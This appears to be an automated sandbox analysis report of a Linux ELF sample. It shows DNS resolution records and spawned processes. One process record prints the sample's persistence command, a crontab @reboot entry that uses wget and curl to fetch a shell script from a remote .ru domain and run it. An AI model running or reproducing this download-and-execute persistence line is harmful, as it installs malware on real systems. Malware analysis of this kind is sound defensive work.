Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:37.941864967 CET | 217.160.70.42 | 192.168.2.23 | 0xfd4c | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:44.262546062 CET | 185.181.61.24 | 192.168.2.23 | 0x2608 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:50.143531084 CET | 185.181.61.24 | 192.168.2.23 | 0x73ab | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 27, 2024 08:09:56.151252985 CET | 185.181.61.24 | 192.168.2.23 | 0x860 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /tmp/x86.elf |
Arguments: | /tmp/x86.elf |
File size: | 95576 bytes |
MD5 hash: | bb9275394716c60d1941432c7085ca13 |
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /tmp/x86.elf |
Arguments: | - |
File size: | 95576 bytes |
MD5 hash: | bb9275394716c60d1941432c7085ca13 |
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /bin/sh |
Arguments: | sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /bin/sh |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
Start time (UTC): | 07:07:56 |
Start date (UTC): | 27/10/2024 |
Path: | /tmp/x86.elf |
Arguments: | - |
File size: | 95576 bytes |
MD5 hash: | bb9275394716c60d1941432c7085ca13 |